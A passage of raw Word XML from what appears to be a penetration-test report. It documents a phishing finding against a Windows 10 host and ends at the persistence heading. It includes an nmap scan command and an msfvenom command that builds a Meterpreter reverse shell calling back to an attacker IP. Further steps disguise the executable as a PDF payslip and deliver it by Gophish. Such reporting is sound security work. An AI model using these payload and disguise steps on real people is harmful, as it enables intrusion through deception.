            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>CVE:2014-6287</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00EF278D">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763A6A2C" w14:textId="77777777" w:rsidR="00054F23" w:rsidRDefault="00054F23" w:rsidP="007D2747">
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For more details, please see Exploit-DB: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Rejetto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> HTTP File Server Vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1611BB4D" w14:textId="77777777" w:rsidR="00B76FCB" w:rsidRDefault="00054F23" w:rsidP="007D2747">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="008D1701">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vulnerability Title:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B76FCB" w:rsidRPr="00B76FCB">
        <w:t>Phishing Attack Leading to Remote Code Execution and Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636B9A8F" w14:textId="58F3A51A" w:rsidR="00054F23" w:rsidRPr="008D1701" w:rsidRDefault="00054F23" w:rsidP="007D2747">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D1701">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ID: 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321556C9" w14:textId="29EF8CDC" w:rsidR="00054F23" w:rsidRDefault="00054F23" w:rsidP="007D2747">
      <w:r w:rsidRPr="008D1701">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Severity:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Critical/High</w:t>
      </w:r>
      <w:r w:rsidR="00EF278D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AF3A01" w14:textId="77777777" w:rsidR="00054F23" w:rsidRPr="008D1701" w:rsidRDefault="00054F23" w:rsidP="007D2747">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D1701">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F4C712" w14:textId="77777777" w:rsidR="006E1114" w:rsidRDefault="006E1114" w:rsidP="007D2747">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A targeted phishing attack was successfully executed against the Windows 10 system. A malicious payload was generated and disguised as a legitimate document to deceive the target. The phishing email, crafted using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Gophish</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, contained an attachment that appeared to be a PDF file but was, </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>in fact, an executable (.exe) with a modified icon. Upon execution, the payload established a Meterpreter TCP reverse shell, granting us remote access to the compromised system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6785E1A4" w14:textId="77777777" w:rsidR="006E1114" w:rsidRDefault="006E1114" w:rsidP="007D2747"/>
    <w:p w14:paraId="5DAD4E1F" w14:textId="320ED2CD" w:rsidR="005E7840" w:rsidRDefault="006E1114" w:rsidP="007D2747">
      <w:r>
        <w:t>To ensure continued access, we installed a persistent backdoor using the Metasploit persistence module (windows/local/persistence), allowing the attacker to regain access even after a system reboot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC4AC8E" w14:textId="24DC9E67" w:rsidR="005E7840" w:rsidRPr="005E7840" w:rsidRDefault="00054F23" w:rsidP="007D2747">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC24AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vulnerable Resources (URL/IP Address/Asset):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5555F1F4" w14:textId="77777777" w:rsidR="00054F23" w:rsidRDefault="00054F23" w:rsidP="007D2747">
      <w:r w:rsidRPr="00BC24AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Target Email:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sprintspro123@outlook.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D30087D" w14:textId="77777777" w:rsidR="00054F23" w:rsidRDefault="00054F23" w:rsidP="007D2747">
      <w:r>
        <w:t>Asset: Windows 10 workstations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117A534F" w14:textId="1939FB09" w:rsidR="00920D8C" w:rsidRPr="00920D8C" w:rsidRDefault="00920D8C" w:rsidP="007D2747">
      <w:r w:rsidRPr="00920D8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Payload Execution Method: </w:t>
      </w:r>
      <w:r w:rsidRPr="00920D8C">
        <w:t>Social Engineering (Phishing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEC9A6E" w14:textId="08387D00" w:rsidR="00BB6A69" w:rsidRPr="00BB6A69" w:rsidRDefault="00BB6A69" w:rsidP="007D2747">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB6A69">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Discovery:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52ED1F7D" w14:textId="04ABF7C2" w:rsidR="00BB6A69" w:rsidRDefault="00BB6A69" w:rsidP="007D2747">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>A detailed Nmap scan was performed, confirming the operating system and enumerating open ports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1738F656" w14:textId="77777777" w:rsidR="001F4912" w:rsidRDefault="001F4912" w:rsidP="007D2747">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33D8090F" w14:textId="77777777" w:rsidR="00500698" w:rsidRDefault="00500698" w:rsidP="007D2747">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>code</w:t>
      </w:r>
      <w:r w:rsidR="00B7472F" w:rsidRPr="005E7840">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17390557" w14:textId="274597A9" w:rsidR="00B7472F" w:rsidRDefault="007435F4" w:rsidP="007D2747">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001F4912">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>sudo</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nmap</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sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001F4912">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> -O -T2 </w:t>
      </w:r>
      <w:r w:rsidR="00056B3C" w:rsidRPr="001F4912">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">100.113.47.90 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F4912">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>--min-rate=100 --max-retries=1 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001F4912">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>vv</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oN</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OS_scan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7CA9FA19" w14:textId="62941A6F" w:rsidR="00BB6A69" w:rsidRDefault="00BB6A69" w:rsidP="007D2747">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F5B18AF" w14:textId="6393D347" w:rsidR="009A288A" w:rsidRDefault="009A288A" w:rsidP="007D2747">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A288A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Attack Scenario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2E181E" w14:textId="0A3E3B97" w:rsidR="00C64D50" w:rsidRDefault="00C64D50" w:rsidP="007D2747">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C64D50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C64D50">
        <w:t>Payload Creation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35769533" w14:textId="3C438B19" w:rsidR="00C64D50" w:rsidRDefault="00C64D50" w:rsidP="007D2747">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C64D50">
        <w:t xml:space="preserve">We generated a customized Metasploit payload using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C64D50">
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C64D50">
        <w:t>, embedding a reverse TCP shell to connect back to our Kali machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071E60A1" w14:textId="75C9490B" w:rsidR="001F4912" w:rsidRPr="001F4912" w:rsidRDefault="001F4912" w:rsidP="007D2747">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F4912">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD46914" w14:textId="7B200F36" w:rsidR="0045586F" w:rsidRDefault="0045586F" w:rsidP="007D2747">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001F4912">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001F4912">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p windows/x64/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001F4912">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001F4912">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001F4912">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001F4912">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> LHOST=100.123.236.70 LPORT=9001 -e x64/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001F4912">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001F4912">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> -f exe &gt; payload.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7222916E" w14:textId="77777777" w:rsidR="0064517F" w:rsidRDefault="0064517F" w:rsidP="007D2747">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="269E5F37" w14:textId="7119B654" w:rsidR="0064517F" w:rsidRDefault="00AA4D1E" w:rsidP="007D2747">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA4D1E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 2: Disguising the Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005FC806" w14:textId="14D401E5" w:rsidR="00AD25DE" w:rsidRPr="00AD25DE" w:rsidRDefault="00AD25DE" w:rsidP="007D2747">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD25DE">
        <w:t>Open Resource Hacker and load payload.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7589300C" w14:textId="23A3C3A5" w:rsidR="00AD25DE" w:rsidRPr="00AD25DE" w:rsidRDefault="00AD25DE" w:rsidP="007D2747">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD25DE">
        <w:t>Replace the default icon with a PDF icon (pdf.ico).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F26AC8B" w14:textId="7C0BA19A" w:rsidR="00AA4D1E" w:rsidRPr="00AD25DE" w:rsidRDefault="00AD25DE" w:rsidP="007D2747">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD25DE">
        <w:t>Save the modified executable as Payslip.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8B0ACA" w14:textId="77777777" w:rsidR="00394493" w:rsidRPr="001F4912" w:rsidRDefault="00394493" w:rsidP="007D2747">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7706FCD1" w14:textId="6F999816" w:rsidR="00500698" w:rsidRPr="00500698" w:rsidRDefault="00394493" w:rsidP="007D2747">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CF2CC89" wp14:editId="099DA194">
            <wp:extent cx="3048000" cy="2543175"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="19560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8622" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3048000" cy="2543175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7D616C" w14:textId="6D6C83BE" w:rsidR="004D095A" w:rsidRDefault="0064517F" w:rsidP="007D2747">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="595B4A55" wp14:editId="5D8FB701">
            <wp:extent cx="6400800" cy="1036320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="47088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127" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId13"/>
                    <a:srcRect l="-119" r="119" b="33927"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6400800" cy="1036320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="310B3CE1" w14:textId="5A1E2A72" w:rsidR="0064517F" w:rsidRPr="00FF2144" w:rsidRDefault="004D095A" w:rsidP="00FF2144">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00B50534">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:fldSimple>
    </w:p>
    <w:p w14:paraId="5BE9F5A8" w14:textId="77777777" w:rsidR="00F37366" w:rsidRPr="00F37366" w:rsidRDefault="00F37366" w:rsidP="007D2747">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37366">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3: Deploying the Phishing Email via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F37366">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Gophish</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="754CFC53" w14:textId="3F7534D6" w:rsidR="00B50534" w:rsidRPr="0038008B" w:rsidRDefault="00F37366" w:rsidP="0038008B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00F37366">
        <w:t xml:space="preserve">Once the payload was disguised, we crafted and sent a phishing email using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F37366">
        <w:t>Gophish</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F37366">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66309FDE" w14:textId="4DCB7D4A" w:rsidR="00F37366" w:rsidRDefault="00D54F2F" w:rsidP="007D2747">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D54F2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 4: Payload Execution and Reverse Shell Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF78D79" w14:textId="223A4DF2" w:rsidR="00534AE3" w:rsidRPr="00534AE3" w:rsidRDefault="00534AE3" w:rsidP="007D2747">
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00534AE3">
        <w:t>Once the victim opened Payslip.exe, it executed the Meterpreter payload, establishing a reverse shell connection to our attacker machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FB05E5" w14:textId="77777777" w:rsidR="00534AE3" w:rsidRPr="00534AE3" w:rsidRDefault="00534AE3" w:rsidP="007D2747">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00534AE3">
        <w:t xml:space="preserve">The victim unknowingly executed the payload, thinking it was a legitimate </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00534AE3">
        <w:t>payslip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00534AE3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071DD8BE" w14:textId="77777777" w:rsidR="00534AE3" w:rsidRPr="00534AE3" w:rsidRDefault="00534AE3" w:rsidP="007D2747">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00534AE3">
        <w:t>Our Kali machine, running Metasploit, received an incoming Meterpreter session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F10AD7E" w14:textId="6CFA4CB3" w:rsidR="00534AE3" w:rsidRDefault="00534AE3" w:rsidP="007D2747">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00534AE3">
        <w:t>We successfully gained fully remote access to the Windows 10 system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23100F0F" w14:textId="77777777" w:rsidR="00534AE3" w:rsidRPr="00534AE3" w:rsidRDefault="00534AE3" w:rsidP="007D2747">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11AE7D20" w14:textId="77777777" w:rsidR="00B50534" w:rsidRDefault="00976773" w:rsidP="007D2747">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C7C16B7" wp14:editId="45602320">
            <wp:extent cx="6400800" cy="3525981"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7847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9290" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6409244" cy="3530633"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="291A053A" w14:textId="53D7D4B1" w:rsidR="00B50534" w:rsidRDefault="00B50534" w:rsidP="00FF2144">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
      </w:fldSimple>
    </w:p>
    <w:p w14:paraId="37436F15" w14:textId="0D845769" w:rsidR="00B50534" w:rsidRPr="00F6279D" w:rsidRDefault="00B50534" w:rsidP="007D2747">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F6279D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reconnaissance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310950AC" w14:textId="77777777" w:rsidR="00B50534" w:rsidRDefault="00B50534" w:rsidP="007D2747">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>Our initial assessment used multi/recon/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>local_exploit_suggester</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to gather recommendations on exploiting vulnerabilities on the Windows 10 system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F6F7B8" w14:textId="752ACAA8" w:rsidR="00B50534" w:rsidRDefault="00FF2144" w:rsidP="00920B1C">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69114F3F" wp14:editId="581A0179">
            <wp:extent cx="6393180" cy="2796540"/>
            <wp:effectExtent l="0" t="0" r="7620" b="3810"/>
            <wp:docPr id="464661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3180" cy="2796540"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8A1313" w14:textId="524946FA" w:rsidR="00B50534" w:rsidRDefault="00B50534" w:rsidP="00920B1C">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
      </w:fldSimple>
    </w:p>
    <w:p w14:paraId="0AE4A7D7" w14:textId="77777777" w:rsidR="00FD3E2A" w:rsidRDefault="00FD3E2A" w:rsidP="007D2747">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15F90DD8" w14:textId="37E5EDE8" w:rsidR="00DC3E32" w:rsidRDefault="00DC3E32" w:rsidP="007D2747">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC3E32">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step 5: </w:t>
      </w:r>
      <w:r w:rsidRPr="00976773">
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="001E672B">
        <w:t>aintaining Access (Persistence)</w:t>
      </w:r>
    </w:p>
